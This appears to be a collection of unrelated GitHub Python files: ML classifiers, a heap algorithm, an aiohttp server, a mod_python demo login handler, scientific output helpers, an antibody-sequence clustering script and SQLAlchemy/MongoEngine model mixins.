parser.add_argument("--remarks", "-r", type=str, default="", help="Remarks")
# NOTE(review): type=bool is an argparse footgun — any non-empty string
# (including "False") parses as True; an action='store_true' flag would be safer.
parser.add_argument("--balanced", type=bool, default=False,
                    help="Drop useless features")
parser.add_argument("--neighbors", type=int, default=5,
                    help="Neighbours in KNN")
# Booleans (False by default)
parser.add_argument("--scale", action='store_true', help="Scale data")
parser.add_argument("--drop", action='store_true',
                    help="Drop useless features")
parser.add_argument("--final", action='store_true',
                    help="Put all training data into model fit")
args = parser.parse_args()
# Load features and labels; files have no header row.
train_data = pd.read_csv("data/train_data.csv", header=None).values
test_data = pd.read_csv("data/test_data.csv", header=None).values
train_labels = pd.read_csv("data/train_labels.csv", header=None,
                           names=['class']).values.ravel()
if args.drop:
    # Re-read and drop columns known to carry no signal (0 and 216-219).
    train_data_df = pd.read_csv("data/train_data.csv", header=None)
    test_data_df = pd.read_csv("data/test_data.csv", header=None)
    train_data = train_data_df.drop([0, 216, 217, 218, 219], axis=1).values
    test_data = test_data_df.drop([0, 216, 217, 218, 219], axis=1).values
if args.scale:
    # Scale features to [0, 1].  Fit the scaler on the training data only and
    # reuse the fitted parameters for the test data: fitting a second scaler
    # on the test set leaks test-set statistics and makes train/test feature
    # spaces incomparable (the original called fit_transform on both).
    min_max_scaler = MinMaxScaler(feature_range=(0, 1))
    train_data = min_max_scaler.fit_transform(train_data)
    test_data = min_max_scaler.transform(test_data)
if not args.final:
    # Hold out 30% for validation; eval_set feeds XGBoost early stopping.
    train_data, eval_data, train_labels, eval_labels = \
        train_test_split(train_data, train_labels, random_state=7,
                         test_size=0.3)
    eval_set = [(train_data, train_labels), (eval_data, eval_labels)]
# Instantiate and fit the classifier selected on the command line.
if args.model == "XGBoost":
    model = XGBClassifier(learning_rate=0.1, max_depth=5,
                          min_child_weight=7, n_estimators=1000, nthread=1,
                          # subsample=0.8, colsample_bytree=0.4,
                          subsample=0.7,
                          objective='multi:softprob', num_class=10,
                          gamma=1)
    if args.final:
        # Final model: no held-out set, so no early stopping possible.
        model.fit(train_data, train_labels,
                  verbose=True)
    else:
        model.fit(train_data, train_labels,
                  eval_metric=["merror", "mlogloss"], eval_set=eval_set,
                  early_stopping_rounds=10,
                  verbose=True)
elif args.model == "RandomForest":
    model = RandomForestClassifier(bootstrap=True, criterion="entropy",
                                   max_features=0.4, min_samples_leaf=4,
                                   min_samples_split=12, n_estimators=100,
                                   verbose=3, class_weight='balanced')
    model.fit(train_data, train_labels)
elif args.model == "SVC":
    model = LinearSVC(C=1.0, dual=False, loss="squared_hinge", penalty="l1",
                      tol=1e-4, verbose=3)
    # LinearSVC doesn't implement predict_proba on its own, so wrap it
    model = CalibratedClassifierCV(model)
    model.fit(train_data, train_labels)
elif args.model == "KNN":
    model = KNeighborsClassifier(n_neighbors=args.neighbors)
    model.fit(train_data, train_labels)
results = model.predict(test_data)  # Predicts from 1-10
results_proba = model.predict_proba(test_data)
# 3-fold stratified cross-validation on the training data.
# NOTE(review): recent scikit-learn raises when random_state is set with the
# default shuffle=False — confirm the pinned sklearn version accepts this.
kfold = StratifiedKFold(n_splits=3, random_state=7)
scores = cross_val_score(model, train_data, train_labels,
                         cv=kfold, scoring="neg_log_loss")
accuracy_scores = cross_val_score(model, train_data, train_labels,
                                  cv=kfold, scoring="accuracy")
print("Cross validation logloss scores: {:.5f}[{:.5f}]*"
      .format(np.mean(scores), np.std(scores)))
print("Cross validation accuracy scores: {:.5f}[{:.5f}]*"
      .format(np.mean(accuracy_scores), np.std(accuracy_scores)))
# Unique id used in every output filename (plots, submissions, pickles).
is_final = "FINAL_" if args.final else ""
uid = "{}{}_scaled={}_drop={}_remarks={}".format(
    is_final, args.model,
    args.scale, args.drop,
    args.remarks or args.neighbors)
if not args.final:
    # Validation-set metrics and diagnostic plots.
    eval_predicted_proba = model.predict_proba(eval_data)
    eval_predicted = model.predict(eval_data)
    # Splits into classes from 0-10 (11 classes)
    onehot = to_categorical(eval_labels).astype(int)
    eval_onehot = onehot[:, 1:]  # Trim unnecessary first column (class "0")
    ll = log_loss(eval_onehot, eval_predicted_proba)
    acc = accuracy_score(eval_labels, eval_predicted)
    print("Validation log-loss and accuracy: {:.5f} {:.5f}".format(ll, acc))
    # Learning-curve plots are only available for XGBoost (evals_result).
    if args.model in ["XGBoost"]:
        train_metrics = model.evals_result()['validation_0']
        test_metrics = model.evals_result()['validation_1']
        epochs = len(train_metrics['merror'])
        x_axis = range(0, epochs)
        # plot log loss
        fig, ax = plt.subplots()
        ax.plot(x_axis, train_metrics['mlogloss'], label='Train')
        ax.plot(x_axis, test_metrics['mlogloss'], label='Test')
        ax.legend()
        plt.ylabel('Log Loss')
        plt.title('{} - Log Loss'.format(args.model))
        plt.savefig("img/logloss_{}.png".format(uid))
        plt.show()
        # plot classification error
        fig, ax = plt.subplots()
        ax.plot(x_axis, train_metrics['merror'], label='Train')
        ax.plot(x_axis, test_metrics['merror'], label='Test')
        ax.legend()
        plt.ylabel('Error')
        plt.title('{} - Error'.format(args.model))
        plt.savefig("img/error_{}.png".format(uid))
        plt.show()
    # Confusion matrix
    plot_confusion_matrix(eval_predicted, eval_labels, args.model, uid)
    # AUC ROC scores
    compute_AUC_scores(eval_predicted_proba, eval_labels)
# Save Kaggle submission files
construct_kaggle_submissions(uid, results, results_proba)
# Persist the trained model.  Use a context manager so the handle is
# flushed and closed (the original opened the file and never closed it).
with open("models/{}.mdl".format(uid), "wb") as model_file:
    pickle.dump(model, model_file)
| christabella/music-genre-classification | classifiers.py | classifiers.py | py | 6,740 | python | en | code | 0 | github-code | 13 |
class Solution:
    # @param A : list of list of integers
    # @param B : integer
    # @return an integer
    def solve(self, A, B):
        """Return the B-th smallest element of matrix A.

        Keeps a max-heap of the B smallest values seen so far; once every
        element has been considered, the heap root is the B-th smallest.
        O(n*m*log B) time, O(B) extra space.
        """
        h = []
        for row in A:
            for val in row:
                if len(h) < B:
                    h.append(val)
                    if len(h) == B:
                        # Heap is full for the first time: establish order once.
                        self.buildMaxHeap(h, B)
                else:
                    # Replace the current B-th-smallest candidate if smaller.
                    self.insert(h, val)
        return h[0]

    def buildMaxHeap(self, A, n):
        """Standard bottom-up heap construction: sift down every internal node."""
        start = (n - 2) // 2
        for i in range(start, -1, -1):
            self.heapify(A, n, i)

    def insert(self, A, num):
        """Replace the max element with num when num is smaller.

        Bug fix: after overwriting the root the heap property must be
        restored; the original skipped the re-heapify, so the root was no
        longer guaranteed to be the maximum (e.g. solve([[9,7,8,5]], 3)
        returned 5 instead of 8).
        """
        if num < A[0]:
            A[0] = num
            self.heapify(A, len(A), 0)

    def heapify(self, A, n, i):
        """Iteratively sift A[i] down until both children are <= parent."""
        while i < n:
            largest = i
            left = i * 2 + 1
            right = i * 2 + 2
            if left < n and A[left] > A[largest]:
                largest = left
            if right < n and A[right] > A[largest]:
                largest = right
            if largest == i:
                break
            A[largest], A[i] = A[i], A[largest]
            i = largest
# Demo: the 10th smallest element of this 5x7 sorted matrix (expected: 15).
print(Solution().solve(
    [
        [6, 9, 13, 14, 18, 21, 25],
        [9, 11, 15, 18, 22, 24, 26],
        [10, 13, 18, 21, 25, 28, 31],
        [12, 15, 22, 24, 26, 31, 32],
        [16, 17, 25, 28, 32, 34, 35]
    ], 10))
| sundar91/dsa | Heap/Bth-smallest-element.py | Bth-smallest-element.py | py | 1,329 | python | en | code | 0 | github-code | 13 |
import Preprocess as pp
import re
import nltk
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np
def reviewsToWords(review):
    """Normalise a raw review: keep letters only, lowercase, drop English
    stopwords, and return the surviving words joined by single spaces."""
    letters_only = re.sub("[^a-zA-Z]", # The pattern to search for
                          " ", # The pattern to replace it with
                          review) # The text to search
    lower_case = letters_only.lower() #Converts to lower case
    words = lower_case.split() #Splits into separate words
    # NOTE(review): the stopword set is rebuilt on every call; hoisting it to
    # module level would speed up bulk processing considerably.
    stops = set(stopwords.words("english"))
    wordsOfReview = [w for w in words if not w in stops] #Removes un-useful words (stops)
    returnValue = ( " ".join(wordsOfReview)) #Joins together words with space
    return returnValue
def performPrediction(dataset):
    """Train a bag-of-words RandomForest sentiment model and predict.

    Trains on the first 14175 reviews of `dataset` (columns 'content' and
    'recommended') and predicts 'recommended' for the remainder.  Returns a
    DataFrame with the test reviews and their predicted labels.
    NOTE: uses `xrange`, i.e. this is Python 2 code; the 14175 train/test
    split point is hard-coded.
    """
    # Size of training dataset 1
    no_of_reviews = 14175
    # Cleaned reviews
    cleaned_reviews = []
    # Puts cleaned dataset to new array cleaned_reviews
    print("Processing...")
    for i in xrange(0, no_of_reviews):
        cleaned_reviews.append(reviewsToWords(dataset["content"][i]))
    # Bag-of-words vocabulary capped at the 3000 most frequent terms.
    bag = CountVectorizer(analyzer="word",
                          tokenizer=None,
                          preprocessor=None,
                          stop_words=None,
                          max_features=3000)
    # Fit_transform learns the vocabulary
    trained_Data = bag.fit_transform(cleaned_reviews)
    # Convert to Numpy array
    train_data_features = trained_Data.toarray()
    # Random forest classifier with 100 trees
    forest = RandomForestClassifier(n_estimators=100)
    #Fit the train data with recommended values
    forest = forest.fit(train_data_features, dataset["recommended"][0:14175])
    ###################################TESTING PART#######################################
    print("Testing....")
    # Number of reviews
    num_reviews = len(dataset["content"])
    #New array with cleaned testing reviews
    clean_test_reviews = []
    count_pos = 0
    count_neg = 0
    # Clean the held-out reviews and tally the true label distribution.
    for i in xrange(14175, num_reviews):
        if(dataset["recommended"][i] == 1):
            count_pos+=1
        else:
            count_neg += 1
        clean_review = reviewsToWords(dataset["content"][i])
        clean_test_reviews.append(clean_review)
    # Get a bag of words for the test set, and convert to a numpy array
    test_data_features = bag.transform(clean_test_reviews)
    test_data_features = test_data_features.toarray()
    # Use the random forest to make sentiment label predictions
    result = forest.predict(test_data_features)
    # Copy the results to a pandas dataframe with an "content" column and
    # a "recommended" column
    output = pd.DataFrame(data={"content": dataset["content"][14175:], "recommended": result})
    print("Pos total %s" %count_pos)
    print("Neg total %s" %count_neg)
    return output
def performBagOfWords():
    """Entry point: load data, run the model, print label counts."""
    #Gets data from preprocess
    dataset = pp.getData()
    #TODO Downloads languages
    #nltk.download()
    result = performPrediction(dataset)
    # Count predictions per class (1 = recommended, 0 = not recommended).
    counter_pos = 0
    for index, row in result.iterrows():
        if(row['recommended'] == 1):
            #print(row['content'], row['recommended'])
            counter_pos+=1
    print("Recommended in total %d" % counter_pos)
    counter_neg = 0
    for index, row in result.iterrows():
        if(row['recommended'] == 0):
            #print(row['content'], row['recommended'])
            counter_neg+=1
    print("NOT Recommended in total %d" % counter_neg)
    return
| Eimisas/Sentimental-analysis | Code/Random forest/BagOfWords.py | BagOfWords.py | py | 3,613 | python | en | code | 0 | github-code | 13 |
import asyncio
import aiohttp_cors
from aiohttp import web
from routes import setup_routes
from settings import load_configuration
def set_cors(app):
    """Allow cross-origin requests on every route registered so far."""
    # Configure default CORS settings.
    cors = aiohttp_cors.setup(app, defaults={
        "*": aiohttp_cors.ResourceOptions(
            allow_credentials=True,
            expose_headers=("X-Custom-Server-Header",),
            allow_headers=("X-Requested-With", "Content-Type"),
        )
    })
    # Configure CORS on all routes.
    for route in list(app.router.routes()):
        cors.add(route)
def add_prefix(app, prefix: str):
    """Prepend `prefix` to the path of every registered resource."""
    # add prefix to all paths in app's routes
    for resource in app.router.resources():
        resource.add_prefix(prefix)
        # print(resource.get_info())
        # print(resource.canonical)
def main():
    """Assemble the aiohttp application and run it."""
    # load configurations
    config = load_configuration('./config.yml')
    # create web instance
    app = web.Application()
    # setup routes
    setup_routes(app, config)
    # add route prefix (must happen before CORS setup below)
    add_prefix(app, '/relaxion')
    # config CORS
    set_cors(app)
    web.run_app(app, host=config['host'], port=config['port'])
if __name__ == '__main__':
    main()
from mod_python import apache, Session
from mod_python import util
from xml.dom.minidom import getDOMImplementation, parse, parseString
import urllib
# Check whether the visitor is already logged in;
# if not, show the login page.
def handler(req):
    """mod_python request handler: pass authenticated sessions through,
    otherwise serve the login form and validate submitted credentials."""
    # An existing authenticated session lets the request through untouched.
    try:
        if req.session["kirjautunut"] == "ok":
            return apache.OK
    except:
        # Not logged in: fetch the login page template over HTTP.
        f = urllib.urlopen("http://users.jyu.fi/~helireki/wsovellukset15/demo4/kirjaudu.html")
        pohja = f.read()
        dom1 = parseString(pohja)
        form = util.FieldStorage(req)
        tunnus = form.getfirst("tunnus")
        salasana = form.getfirst("salasana")
        # Hard-coded demo credentials; mark the session authenticated on match.
        if tunnus == "tiea218@foo.example" and salasana == "salasana":
            req.session["kirjautunut"] = "ok"
            req.session.save()
            return apache.OK
        req.content_type = "text/html ;charset=utf-8"
        bodi = dom1.getElementsByTagName("body")[0]
        viesti = ""
        # Build feedback (in Finnish) for a failed login attempt:
        # unknown username vs. wrong password.
        if form.getfirst("kirjaudu") == "Kirjaudu":
            if tunnus != "tiea218@foo.example":
                viesti = "Käyttäjätunnusta ei löytynyt. "
            elif salasana != "salasana":
                viesti += "Käyttäjätunnus oli oikea, mutta salasana väärä. "
        # Append the feedback paragraph to the page body and emit the page.
        p = dom1.createElement("p")
        viesti += "Syötä tunnus ja salasana uudelleen."
        p.appendChild(dom1.createTextNode(viesti.decode("UTF-8")))
        bodi.appendChild(p)
        req.write(dom1.toxml("UTF-8"))
        return apache.DONE
| helireki/TIEA218-15 | demo4/autentikointi.py | autentikointi.py | py | 1,500 | python | fi | code | 0 | github-code | 13 |
# Third-party libraries
import os
import sys

import numpy as np
# Set paths to folders
def set_paths():
    """Resolve and (where missing) create the project folder layout.

    Returns a tuple (work_dir, data_dir, fig_dir, csv_dir, tec_dir, nn_dir).
    Aborts via sys.exit() when the mandatory work/data folders are absent.
    """
    # Path to the output folder (must already exist)
    work_dir = '../work/'
    if not os.path.exists(work_dir):
        sys.exit('WORKING FOLDER DOES NOT EXIST!')
    # Path to the data directory (must already exist)
    data_dir = work_dir + 'data/'
    if not os.path.exists(data_dir):
        sys.exit('FOLDER WITH DATA DOES NOT EXIST!')
    # Path to the figures directory
    fig_dir = work_dir + 'fig/'
    if not os.path.exists(fig_dir):
        os.makedirs(fig_dir)
        os.makedirs(fig_dir + 'train/')
        os.makedirs(fig_dir + 'train/split/')
        os.makedirs(fig_dir + 'valid/')
        os.makedirs(fig_dir + 'valid/split/')
        os.makedirs(fig_dir + 'test/')
        # Bug fix: this line previously used csv_dir, which is not defined
        # until later in the function (NameError at runtime); the figures
        # tree needs fig_dir here.
        os.makedirs(fig_dir + 'test/init/')
        print('FOLDERS FOR FIGURES WERE CREATED!')
    # Path to .csv files directory
    csv_dir = work_dir + 'csv/'
    if not os.path.exists(csv_dir):
        os.makedirs(csv_dir)
        os.makedirs(csv_dir + 'train/')
        os.makedirs(csv_dir + 'valid/')
        os.makedirs(csv_dir + 'test/')
        print('FOLDERS FOR .CSV FILES WERE CREATED!')
    # Path to the tecplot directory
    tec_dir = work_dir + 'tec/'
    if not os.path.exists(tec_dir):
        os.makedirs(tec_dir)
        os.makedirs(tec_dir + 'train/')
        os.makedirs(tec_dir + 'valid/')
        os.makedirs(tec_dir + 'test/')
        print('FOLDERS FOR TECPLOT FILES WERE CREATED!')
    # Path to the saved model directory
    nn_dir = work_dir + 'nn/'
    if not os.path.exists(nn_dir):
        os.makedirs(nn_dir)
        print('FOLDER FOR NN FILES WAS CREATED!')
    return work_dir, data_dir, fig_dir, csv_dir, tec_dir, nn_dir
# Fields output for tecplot
def write_tec_var(n, var1, var2, x, y, time, res_plt, var_name1, var_name2):
    """Dump two scalar fields on an n-by-n grid as one Tecplot block-format zone.

    Writes the x block, the y block, then both (transposed) field blocks,
    each value formatted with 12 decimal places.
    """
    fmt = "%.12f"
    v1 = np.transpose(var1)
    v2 = np.transpose(var2)
    res_plt.write('title="fields" variables="x" "y" "' + var_name1 + '"' +
                  ' "' + var_name2 + '" \n')
    res_plt.write('zone t="time=' + str(time) + '" i=' + str(n) +
                  ' j=' + str(n) + ' f=block')

    def emit_block(value_at):
        # One leading newline per row, then n space-terminated values.
        for i in range(n):
            res_plt.write("\n")
            for j in range(n):
                res_plt.write(fmt % value_at(i, j) + " ")

    emit_block(lambda i, j: x[i])       # x coordinates (constant per row)
    emit_block(lambda i, j: y[j])       # y coordinates (constant per column)
    emit_block(lambda i, j: v1[i, j])   # first field
    emit_block(lambda i, j: v2[i, j])   # second field
    res_plt.write("\n")
| aiskhak/NN_PDE | CS1/inout.py | inout.py | py | 2,751 | python | en | code | 0 | github-code | 13 |
my_array = []
def helper(n, target, index, temp_arr, temp_sum):
    """Depth-first search: at each index either reuse the current candidate
    (index unchanged, repetition allowed) or skip to the next one."""
    if temp_sum == target:
        # Exact hit: record a snapshot of the current combination.
        my_array.append(list(temp_arr))
        return
    if index == len(n) or temp_sum > target:
        # Ran out of candidates, or overshot the target.
        return
    # Branch 1: take n[index] again.
    temp_arr.append(n[index])
    helper(n, target, index, temp_arr, temp_sum + n[index])
    temp_arr.pop()
    # Branch 2: move past n[index].
    helper(n, target, index + 1, temp_arr, temp_sum)
def combSum(ARR, B):
    """Return every combination of ARR values (repetition allowed) that sums
    to B, each combination sorted ascending, in discovery order."""
    global my_array
    my_array = []
    helper(ARR, B, 0, [], 0)
    my_array = [sorted(combo) for combo in my_array]
    return my_array
# Demo: all multisets of {3, 2, 1} summing to 5.
print(combSum([3, 2, 1], 5))
| KillerStrike17/CP-Journey | Codein10/BackTracking/Combination_sum_II.py | Combination_sum_II.py | py | 841 | python | en | code | 0 | github-code | 13 |
'''
Python module dependencies:
biopython==1.63
fastcluster==1.1.13
numpy==1.7.1
python-Levenshtein==0.11.2
scipy==0.12.0
Under Ubuntu, scipy, numpy and biopython can be installed as:
sudo apt-get install python-biopython python-numpy python-scipy
fastcluster and python-Levenshtein can be installed using pip:
pip install fastcluster python-Levenshtein
'''
from __future__ import print_function
import time
import math
import json
import numpy as np
from multiprocessing import Pool, cpu_count
import fastcluster as fc
from Bio import pairwise2
from Levenshtein import distance
from scipy.cluster.hierarchy import fcluster
import subprocess
import os
import resource
# float32 keeps the (potentially huge) condensed distance matrix small.
default_dtype = 'f4'
# Flat-cluster threshold handed to scipy's fcluster (average-linkage distance).
distance_cutoff = 0.32
class Seq(object):
    """Genetic characteristics of a single sequence.

    data: a MongoDB result (dict-like) containing the fields
        [seq_id, v_gene, j_gene, <junc_query>] and optionally var_muts_nt,
        where <junc_query> names the nucleotide or AA junction field.
    junc_query: either 'junc_aa' or 'junc_nt'.
    """
    def __init__(self, data, junc_query):
        self.id = data['seq_id']
        v_info = data['v_gene']
        self.v_fam = v_info['fam']
        self.v_gene = v_info['gene']
        self.v_all = v_info['all']
        j_info = data['j_gene']
        self.j_gene = j_info['gene']
        self.j_all = j_info['all']
        self.junc = data[junc_query]
        self.junc_len = len(self.junc)
        # Shared-mutation scoring uses this list; empty when absent.
        self.muts = data['var_muts_nt']['muts'] if 'var_muts_nt' in data else []
    def v_gene_string(self):
        """Family-gene label, e.g. 'v3-23'."""
        return 'v{0}-{1}'.format(self.v_fam, self.v_gene)
    def v_fam_string(self):
        """Family-only label, e.g. 'v3'."""
        return 'v{0}'.format(self.v_fam)
def get_LD(i, j):
    '''Calculate sequence distance between a pair of Seq objects'''
    # pairwise2 is used to force 'gapless' distance when sequence pair is of the same length
    if i.junc_len == j.junc_len:
        # With match=1, mismatch=0 and heavy gap penalties (-50), the score
        # equals the identity count, so length - identity = substitutions.
        identity = pairwise2.align.globalms(i.junc, j.junc, 1, 0, -50, -50, score_only=True, one_alignment_only=True)
        return i.junc_len - identity
    # Levenshtein distance is used for sequence pairs of different lengths
    else:
        return distance(i.junc, j.junc)
def vCompare(i, j):
    '''Penalty for Variable-segment mismatches: 8 for a different gene,
    1 for the same gene but a different allele, 0 for a full match.'''
    if i.v_gene != j.v_gene:
        return 8
    return 1 if i.v_all != j.v_all else 0
def jCompare(i, j):
    '''Penalty for Joining-segment mismatches: 8 for a different gene,
    1 for the same gene but a different allele, 0 for a full match.'''
    if i.j_gene != j.j_gene:
        return 8
    return 1 if i.j_all != j.j_all else 0
def sharedMuts(i, j):
    '''Bonus of 0.35 per mutation of i also present in j (empty entries
    ignored); identical sequence ids earn no bonus at all.'''
    if i.id == j.id:
        return 0.0
    other = j.muts
    return sum((0.35 for mut in i.muts if mut != '' and mut in other), 0.0)
def get_score(i, j=None):
    """Combined pairwise distance between two Seq objects.

    Junction edit distance plus V/J segment penalties plus a length penalty,
    minus a shared-mutation bonus, normalised by the shorter junction length.
    """
    if j is None:
        # Allow a single (i, j) tuple argument, as produced by make_iter(mode=1).
        i, j = i
    if i.id == j.id:
        return 0.0
    LD = get_LD(i, j)
    vPenalty = vCompare(i, j)
    jPenalty = jCompare(i, j)
    lenPenalty = math.fabs(i.junc_len - j.junc_len) * 2
    editLength = min(i.junc_len, j.junc_len)
    mutBonus = sharedMuts(i, j)
    # Cap the bonus just below the accumulated penalties.
    if mutBonus > (LD + vPenalty + jPenalty):
        mutBonus = (LD + vPenalty + jPenalty - 0.001) # distance values can't be negative
    return (LD + vPenalty + jPenalty + lenPenalty - mutBonus) / editLength
def make_iter(seqs, mode=1):
    """Yield work units for the pool: mode 1 gives every (seq_i, seq_j)
    pair with i < j; any other mode gives (seq_i, remaining-list) rows."""
    pairwise = (mode == 1)
    for idx, left in enumerate(seqs):
        tail = seqs[idx + 1:]
        if pairwise:
            for right in tail:
                yield (left, right)
        else:
            yield (left, tail)
def get_scores_one_row(args):
    """Score one row: args is (seq_i, later_seqs); returns the distances
    from seq_i to every later sequence as a float32 array."""
    (seq_i, row_j) = args
    return np.array([get_score(seq_i, seq_j) for seq_j in row_j], dtype=default_dtype)
def build_condensed_matrix(seqs, mode=2):
    """Compute the condensed (upper-triangle) pairwise distance matrix in
    parallel; mode 1 scores individual pairs, mode 2 scores whole rows."""
    result = np.array([], dtype=default_dtype)
    p = Pool(processes=cpu_count())
    if mode == 1:
        n = len(seqs)
        #chunksize = 500000
        # NOTE(review): for small n this expression evaluates to 0, which
        # imap rejects (chunksize must be >= 1) — confirm inputs are always
        # large enough, or clamp with max(1, ...).
        chunksize = int(n * (n - 1) / 2 / cpu_count() / 2)
        result_one = p.imap(get_score, make_iter(seqs, mode=1), chunksize=chunksize)
        result = np.array(list(result_one), dtype=default_dtype)
    else:
        result_one_row = p.imap(get_scores_one_row, make_iter(seqs, mode=2), chunksize=100)
        result = np.concatenate(list(result_one_row))
    #p.close()
    #p.join()
    return result
def build_cluster_dict(flatCluster):
    """Invert fcluster output: map cluster id -> list of member indices."""
    clusters = {}
    for idx, cluster_id in enumerate(flatCluster):
        clusters.setdefault(cluster_id, []).append(idx)
    return clusters
def make_clusters(con_distMatrix):
    """Average-linkage hierarchical clustering of the condensed distance
    matrix, flattened at the module-level distance_cutoff."""
    linkageMatrix = fc.linkage(con_distMatrix, method='average', preserve_input=False)
    del con_distMatrix  # free the (potentially huge) matrix early
    flatCluster = fcluster(linkageMatrix, distance_cutoff, criterion='distance')
    del linkageMatrix
    return flatCluster
def write_output(outfile, clusters, seqs, vh='v0'):
    """Write each cluster of size >= 2 as a FASTA-like lineage record."""
    with open(outfile, 'w') as out_f:
        for cluster_id, members in clusters.items():
            if len(members) < 2:
                continue  # singletons are not lineages
            record = ["#lineage_{0}_{1}\n".format(vh, str(cluster_id))]
            for seq_idx in members:
                seq = seqs[seq_idx]
                record.append('>{0}\n{1}\n'.format(seq.id, seq.junc))
            record.append('\n')
            out_f.write(''.join(record))
def get_memery_usage():
    # (Name typo kept: existing callers throughout this module use it.)
    """Print the process's current RSS (via `ps`) and peak RSS (via resource)."""
    rss = subprocess.check_output('ps -p {} u'.format(os.getpid()), shell=True).decode('utf-8').split('\n')[1].split()[5]
    max_rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
    print('current_rss: {}\tmax_rss: {}'.format(rss, max_rss))
def analyze(infile, outfile=None, n=None, output_format='cluster_only', memory_usage=False):
    """End-to-end clonify run: load sequences, build the pairwise distance
    matrix, cluster, and write the result.

    infile: JSON file with a list of sequence records (see Seq).
    outfile: destination file for clusters.
    n: optional cap on the number of input sequences.
    output_format: 'seqs' writes FASTA-like lineages; anything else writes
        the raw flat cluster ids via numpy.savetxt.
    memory_usage: when True, print RSS after each phase.
    """
    if memory_usage:
        get_memery_usage()
    t00 = time.time()
    print("Loading input sequences...", end='')
    with open(infile) as in_f:
        seqs = json.load(in_f)
    if n:
        seqs = seqs[:n]
    seqs = [Seq(s, 'junc_aa') for s in seqs]
    print("done. [{}, {:.2f}s]".format(len(seqs), time.time() - t00))
    if memory_usage:
        get_memery_usage()
    t0 = time.time()
    print("Calculating condensed distance matrix...", end='')
    con_distMatrix = build_condensed_matrix(seqs, mode=2)  # ####
    print("done. [{}, {:.2f}s]".format(con_distMatrix.shape, time.time() - t0))
    print("\tmin: {}, max: {}".format(con_distMatrix.min(), con_distMatrix.max()))
    if memory_usage:
        get_memery_usage()
    t0 = time.time()
    print("Calculating clusters...", end='')
    clusters = make_clusters(con_distMatrix)
    print("done. [{}, {:.2f}s]".format(clusters.max(), time.time() - t0))
    if memory_usage:
        get_memery_usage()
    t0 = time.time()
    print ("Outputting clusters...", end='')
    if output_format == 'seqs':
        clusters = build_cluster_dict(clusters)
        write_output(outfile, clusters, seqs)
    else:
        np.savetxt(outfile, clusters, fmt='%d')
    print("done. {:.2f}s".format(time.time() - t0))
    print('=' * 20)
    print("Finished! Total time= {:.2f}s".format(time.time() - t00))
    if memory_usage:
        get_memery_usage()
if __name__ == '__main__':
    # Command-line front end for analyze().
    import argparse
    parser = argparse.ArgumentParser(description='Clonify script.')
    parser.add_argument('infile', action="store", help='input sequence file')
    parser.add_argument('outfile', action="store", help='output file')
    parser.add_argument('-n', action="store", dest="n", type=int,
                        help='maximum number of sequences to process from input file')
    parser.add_argument('-f', action='store', dest='output_format', default='cluster_only',
                        help='output format: cluster_only | seqs.')
    parser.add_argument('-m', action='store_true', dest='memory_usage',
                        help='print out memeory useage')
    args = parser.parse_args()
    analyze(args.infile, args.outfile, n=args.n,
            output_format=args.output_format,
            memory_usage=args.memory_usage)
| SuLab/Antibody-Clustering-Challenge | original_python_code.py | original_python_code.py | py | 8,052 | python | en | code | 1 | github-code | 13 |
from bson import ObjectId
import uuid
import sqlalchemy as db
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship, synonym
__all__ = [
'MongoReference',
'MongoEmbedded',
'MongoEmbeddedList',
'Base',
'UserBase',
]
def MongoReference(field, ref_cls, queryset=None):
    """
    SQLA field that represents a reference to a MongoEngine document.
    The value is cached until an assignment is made.
    To use a custom QuerySet (instead of the default `ref_cls.objects`),
    pass it as the `queryset` kwarg. You can also pass a function that
    resolves to a QuerySet.
    """
    def _resolve_queryset():
        # `queryset` may be a QuerySet (callable in MongoEngine) or a
        # zero-argument function returning one.
        if queryset is None:
            return ref_cls.objects
        else:
            return queryset()
    def _get(obj):
        qs = _resolve_queryset()
        # Dereference lazily and memoize on the instance until reassigned.
        if not hasattr(obj, '_%s__cache' % field):
            ref_id = getattr(obj, field)
            if ref_id is None:
                ref = None
            else:
                ref = qs.get(pk=ref_id)
            setattr(obj, '_%s__cache' % field, ref)
        return getattr(obj, '_%s__cache' % field)
    def _set(obj, val):
        # Any assignment invalidates the cached document.
        if hasattr(obj, '_%s__cache' % field):
            delattr(obj, '_%s__cache' % field)
        # Accept a document, an ObjectId, or a raw id; store the string id.
        if isinstance(val, ref_cls):
            val = val.pk
        if isinstance(val, ObjectId):
            val = str(val)
        setattr(obj, field, val)
    return synonym(field, descriptor=property(_get, _set))
def MongoEmbedded(field, emb_cls):
    """
    SQLA field that represents a MongoEngine embedded document.
    Converts the JSON value to/from an EmbeddedDocument. Note that a new
    instance is returned every time we access and we must reassign any changes
    back to the model.
    """
    def _get(obj):
        # Deserialize the stored SON/JSON into a fresh EmbeddedDocument.
        return emb_cls._from_son(getattr(obj, field))
    def _set(obj, val):
        # Serialize the EmbeddedDocument back to its SON representation.
        setattr(obj, field, val.to_mongo())
    return synonym(field, descriptor=property(_get, _set))
def MongoEmbeddedList(field, emb_cls):
    """SQLA field that represents a list of MongoEngine embedded documents."""
    def _get(obj):
        # New EmbeddedDocument instances on every access (same caveat as
        # MongoEmbedded: reassign the whole list to persist changes).
        return [emb_cls._from_son(item) for item in getattr(obj, field)]
    def _set(obj, val):
        setattr(obj, field, [item.to_mongo() for item in val])
    return synonym(field, descriptor=property(_get, _set))
# From https://code.launchpad.net/~stefanor/ibid/sqlalchemy-0.6-trunk/+merge/66033
class PGSQLModeListener(object):
    """Connection-pool listener that pins every new connection to UTC."""
    def connect(self, dbapi_con, con_record):
        c = dbapi_con.cursor()
        c.execute("SET TIME ZONE UTC")
        c.close()
class Base(object):
    """Common SQLAlchemy mixin: UUID primary key plus audit timestamps."""
    # Random UUID4 primary key stored as a string.
    id = db.Column(UUID, default=lambda: str(uuid.uuid4()), primary_key=True)
    created_at = db.Column(db.DateTime(), default=db.func.now())
    # Refreshed by the database on every UPDATE.
    updated_at = db.Column(
        db.DateTime(), default=db.func.now(), onupdate=db.func.now()
    )
    @property
    def pk(self):
        # MongoEngine-style alias for the primary key.
        return self.id
    # Newest-first default ordering for queries.
    __mapper_args__ = {'order_by': db.desc('updated_at')}
class UserBase(Base):
    """Base with created_by/updated_by user tracking.

    declared_attr defers column/relationship creation until subclass mapping,
    so cls resolves to the concrete model.  Subclasses override
    _get_current_user to supply the acting user's id.
    """
    created_by_id = declared_attr(
        lambda cls: db.Column(
            UUID, db.ForeignKey('user.id'), default=cls._get_current_user
        )
    )
